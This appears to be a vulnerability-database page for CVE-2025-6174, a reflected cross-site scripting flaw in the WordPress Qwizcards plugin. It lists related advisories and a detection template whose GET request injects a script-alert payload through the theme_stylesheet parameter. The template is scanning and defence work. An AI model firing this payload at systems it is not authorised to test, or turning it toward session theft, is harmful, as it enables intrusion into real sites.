| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
| CVE-2025-6174 | 23 Jul 202509:07 | – | circl | |
| WordPress plugin Qwizcards 安全漏洞 | 23 Jul 202500:00 | – | cnnvd | |
| WordPress Qwizcards plugin cross-site scripting vulnerability | 25 Jul 202500:00 | – | cnvd | |
| CVE-2025-6174 | 23 Jul 202506:00 | – | cve | |
| CVE-2025-6174 WordPress Qwizcards <= 3.9.4 - Reflected XSS | 23 Jul 202506:00 | – | cvelist | |
| EUVD-2025-22421 | 3 Oct 202520:07 | – | euvd | |
| CVE-2025-6174 | 23 Jul 202506:15 | – | nvd | |
| WordPress WordPress Qwizcards plugin < 3.95 - Reflected XSS vulnerability | 23 Jul 202512:37 | – | patchstack | |
| PT-2025-30544 · WordPress · Qwizcards | 23 Jul 202500:00 | – | ptsecurity | |
| CVE-2025-6174 | 25 Jul 202506:26 | – | redhatcve |
id: CVE-2025-6174
info:
name: WordPress Qwizcards < 3.95 - Cross-Site Scripting (Reflected)
author: 0x_Akoko
severity: medium
description: |
The WordPress Qwizcards plugin before version 3.95 does not sanitise and escape the "theme_stylesheet" parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting vulnerability.
impact: |
Attackers can execute scripts in the context of high privilege users, potentially leading to account compromise or session hijacking.
remediation: |
Update to the latest version beyond 3.9.4.
reference:
- https://wpscan.com/vulnerability/ff827f67-712e-4ab6-b6aa-7f5e6ff1283a/
- https://nvd.nist.gov/vuln/detail/CVE-2025-6174
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2025-6174
epss-score: 0.0046
epss-percentile: 0.36697
cwe-id: CWE-79
metadata:
verified: true
max-request: 1
tags: cve,cve2025,qwizcards,wordpress,wp-plugin,xss,unauth,vkev
variables:
randstr: "{{rand_base(8)}}"
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/qwiz-online-quizzes-and-flashcards/qwiz_admin_sample_buttons.php?theme_stylesheet=\"><script>alert('{{randstr}}')</script>"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<script>alert('{{randstr}}')</script>"
- "rel=\"stylesheet\""
- "qwiz_button"
condition: and
- type: status
status:
- 200
# digest: 4b0a00483046022100f71b76b04b847685d2a286ec13edd571d049b5fca4923f4720bb11ab4129387b0221008e9605c63d1af6697c4cea719b992150bb28fea4aa55792b79d35c79921553e6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation